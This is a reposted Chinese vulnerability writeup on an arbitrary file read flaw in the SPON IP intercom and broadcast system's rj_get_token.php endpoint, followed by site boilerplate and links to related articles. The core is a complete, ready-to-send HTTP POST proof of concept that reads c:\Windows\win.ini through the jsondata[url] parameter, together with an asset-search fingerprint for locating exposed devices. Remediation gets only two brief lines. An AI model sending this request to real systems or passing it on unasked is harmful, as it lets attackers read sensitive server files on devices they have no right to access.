世邦通信SPON IP网络对讲广播系统rj_get_token.php 任意文件读取漏洞

这篇具有很好参考价值的文章主要介绍了世邦通信SPON IP网络对讲广播系统rj_get_token.php 任意文件读取漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

产品介绍

世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

spon IP网络对讲广播系统rj_get_token.php存在任意文件读取漏洞,攻击者可通过该漏洞在服务器端读取任意敏感文件。

资产测绘
icon_hash=“-1830859634”
世邦通信SPON IP网络对讲广播系统rj_get_token.php 任意文件读取漏洞,漏洞复现,网络,php,安全,web安全

漏洞复现

POST /php/rj_get_token.php HTTP/1.1
Host: your_ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

jsondata[url]=c:\Windows\win.ini

读取win.ini配置文件内容
世邦通信SPON IP网络对讲广播系统rj_get_token.php 任意文件读取漏洞,漏洞复现,网络,php,安全,web安全

修复建议

1、升级至最新安全版本。
2、限制接口访问。文章来源地址https://www.toymoban.com/news/detail-822174.html

到了这里,关于世邦通信SPON IP网络对讲广播系统rj_get_token.php 任意文件读取漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 世邦 IP网络对讲广播系统 getjson.php接口存在任意文件读取漏洞

    产品简介 SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。 漏洞概述 SPON世邦IP网络对讲广播系统getjson.php接口处存在任意文件读取漏洞,未经身份验证的攻击者可利用此漏洞读取敏感文件。 指纹识别 fofa: 漏洞利用 poc: 修复建议

    2024年02月03日
    浏览(61)
  • 煤矿调度IP语音对讲广播模块一键求助对讲矿用调度通信系统SIP语音对讲求助终端

     SV-2101VP /  SV-2103VP 系列网络音频模块,所有外部连接采用端子,电源采用2.0mm的端子,网络采用标准RJ45连接器,其他都是1.25mm的连接器。 端口类型定义 P ———— 电源 AI ———— 模拟输入(在这里是音频输入) AO ———— 模拟输出(在这里是音频输出) I ———— 数

    2024年02月12日
    浏览(45)
  • IP广播对讲系统停车场解决方案

    IP广播对讲系统 停车场解决方案 一、需求分析     随着国民经济和社会的发展, 选择 坐车 出行的民众越来越多。在保护交通 安全 的同时,也给 停车场 服务部门提出了更高的要求 。人们 对 停车场系统 提出了更高的要求与挑战, 需要 停车场系统 提高工作效率与服务水

    2024年04月09日
    浏览(53)
  • ip网络广播系统网络音频解码终端公共广播SV-7101

                    网络广播终端 SV-7101V ,接收网络音频流,实时解码播放。本设备只有网络广播功能,是一款简单的网络广播终端。 提供一路线路输出接功放或有源音箱。   产品特点 ■   提供固件网络远程升级 ■   标准RJ45网络接口,支持跨网段、跨路由器 ■   可以

    2024年02月14日
    浏览(57)
  • 一、幼儿园校园广播系统(IP网络广播)建设背景

    幼儿园为给儿童提供优雅的学习生活环境,园领导决定建设一套幼儿园校园广播(IP网络广播)系统。 二、幼儿园校园广播系统(IP网络广播)简述 幼儿园校园广播系统(IP网络广播),采用“技术先进、架构科学、经济实用、利于拓展、方便维护”的设计理念,设计为IP数字

    2024年04月16日
    浏览(46)
  • IP网络广播系统有哪些优点

    IP网络广播系统有哪些优点? IP网络广播系统是基于 TCP/IP 协议的公共广播系统,采用 IP  局域网 或 广域网作为数据传输平台,扩展了公共广播系统的应用范围。随着局域网络和 网络的发展 , 使网络广播的普及变为可能 , 强大的功能及灵活的操作必将成为未来广播系统的主流

    2024年02月10日
    浏览(44)
  • IP网络广播系统草坪音箱景区系统防水石头,草坪音箱的应用

    IP网络广播 系统草坪音箱 景区系统防水 石头 ,草坪 音箱的应用 SV-7045 V 是深圳锐科达 电子 有限公司的一款防水网络草坪音箱,具有10/100M 以太网接口 ,可将网络音源通过自带的功放和喇叭输出播放,可达到功率20W。 常用场景: 公园 ip 草坪 音箱 ,景区 SIP石头音箱 ,高速服

    2024年02月13日
    浏览(44)
  • ip网络广播对讲的特点

    随着科技的不断发展,通讯方式也在不断地变革。传统的对讲机已经无法满足现代化沟通的需求,特别是在大型企业、学校和安保等领域对讲机的局限性已经显现出来。而一种新型通讯方式:IP网络广播对讲正在逐渐受到人们的关注和使用。本篇文章将围绕IP网络广播对讲,从

    2024年02月06日
    浏览(43)
  • 树莓派Debian系统中如何用mDNS广播自己的ip地址

    在 Debian 系统的树莓派上使用 mDNS(Multicast DNS)广播其 IP 地址通常涉及到 Avahi 服务的使用。Avahi 是 Linux 系统中的一个零配置网络(Zeroconf)实现,它允许设备在没有配置DNS服务器的情况下通过网络发现服务和主机名。 以下是在树莓派上设置 Avahi 以使用 mDNS 的步骤: 安装 A

    2024年02月02日
    浏览(41)
  • sip网络号角喇叭 sip音柱 POE供电广播音箱 ip网络防水对讲终端 sip网络功放

    SV-7042TP网络号角喇叭 一、描述   SV-7042TP 是 我 司的一款SIP 网络号角喇叭 ,具有10/100M以太网接口,内置有一个高品质扬声器,将网络音源通过自带的功放和喇叭输出播放,可达到功率 30 W。 SV-7042TP 作为SIP系统的播放终端,可用于需要广播播放的场所,例如智慧城市、校园广

    2024年02月12日
    浏览(53)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包